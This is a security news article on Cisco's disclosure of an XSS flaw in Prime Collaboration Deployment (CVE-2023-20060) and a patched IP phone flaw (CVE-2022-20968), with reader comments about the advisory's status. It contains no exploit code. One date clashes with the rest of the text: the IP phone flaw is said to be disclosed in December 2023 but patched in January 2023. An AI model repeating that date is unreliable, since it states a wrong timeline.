Cisco discloses XSS zero-day flaw in server management tool


Cisco disclosed today a zero-day vulnerability in the company’s Prime Collaboration Deployment (PCD) software that can be exploited for cross-site scripting attacks.

This server management utility enables admins to perform migration or upgrade tasks on servers in their organization’s inventory.

Tracked as CVE-2023-20060, the bug was found in the web-based management interface of Cisco PCD 14 and earlier by Pierre Vivegnis of the NATO Cyber Security Centre (NCSC).

Successful exploitation enables unauthenticated attackers to launch cross-site scripting attacks remotely but requires user interaction.

“This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link,” Cisco explains.

“A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.”

While Cisco shared info on the flaw’s impact, the company will release security updates to address it sometime next month. For now, no workarounds are available to remove the attack vector.

Luckily, the Cisco Product Security Incident Response Team (PSIRT) has yet to find any evidence of malicious use in the wild and is unaware of public exploit code targeting the bug.

Cisco Prime Collaboration Deployment Release First Fixed Release
14 and earlier 14SU3 (May 2023)

December zero-day patched in January

Cisco has also patched another high-severity IP Phone zero-day (CVE-2022-20968) with publicly available exploit code, disclosed in early December 2023.

The company promised security updates would be released in January 2023, and it patched the vulnerability with a new firmware release issued on January 18. However, the advisory is yet to be updated and the firmware update can only be downloaded if you have a Cisco account.

Cisco’s PSIRT warned at the time that it’s “aware that proof-of-concept exploit code is available” and that the “vulnerability has been publicly discussed.”

Devices impacted by CVE-2022-20968 include Cisco IP phones running 7800 and 8800 Series firmware version 14.2 and earlier.

Even though Cisco didn’t provide a workaround for this IP Phone zero-day, it advised admins to apply temporary mitigation measures, which requires disabling the Cisco Discovery Protocol on affected devices supporting Link Layer Discovery Protocol (LLDP) as a fallback option.

“This is not a trivial change and will require diligence on behalf of the enterprise to evaluate any potential impact to devices as well as the best approach to deploy this change in their enterprise,” the company warned at the time.

Update April 27, 14:45 EDT: Revised story to say the IP Phone zero-day was patched in January (the advisory is yet to be updated with this information).


  • Moo_Cows Photo Moo_Cows – 2 days ago

    Unless I’m misunderstanding the vulnerability, Cisco patched the 7800/8800 bug back in January with the release of firmware version 14.2.1.

  • serghei Photo serghei – 2 days ago

    That’s when they said they’d release the fix, but the advisory is yet to be updated.

    You can find the original version of the advisory at

    For comparison, they also say they’ll release Cisco Prime Collaboration Deployment 14SU3 in May 2023 (check the table embedded in this article).

  • Moo_Cows Photo Moo_Cows – 2 days ago

    The fixed firmware version 14.2.1 was released on January 18, 2023. We’re running it in our organization. – screenshot of the firmware download page from Cisco (it’s only accessible if you have a Cisco account).

  • serghei Photo serghei – 2 days ago

    Oh, well… It would’ve been nice if they also updated the advisory when they released the fixed firmware.

    Will update the story to correctly tag it as a patched bug. Thanks!

  • Moo_Cows Photo Moo_Cows – 2 days ago

    Agreed! Their advisory leaves much to be desired!

  • Malwarebytes Anti-Malware Logo

    Malwarebytes Anti-Malware

    Version: 4.5.27 4M+ Downloads

  • AdwCleaner Logo


    Version: 56M+ Downloads

  • Windows Repair (All In One) Logo

    Windows Repair (All In One)

    Version: 4.13.1 2M+ Downloads

  • Everything Desktop Search Logo

    Everything Desktop Search

    Version: 22,754 Downloads

  • Zemana AntiLogger Free Logo

    Zemana AntiLogger Free

    Version: 53,716 Downloads


Related posts

DDoS attacks shifting to VPS infrastructure for increased power

Sarah Henriquez

Ragnar Locker ransomware claims attack on Portugal’s flag airline

Sarah Henriquez

Google to test disabling Chrome Manifest V2 extensions in June 2023

Sarah Henriquez

Leave a Comment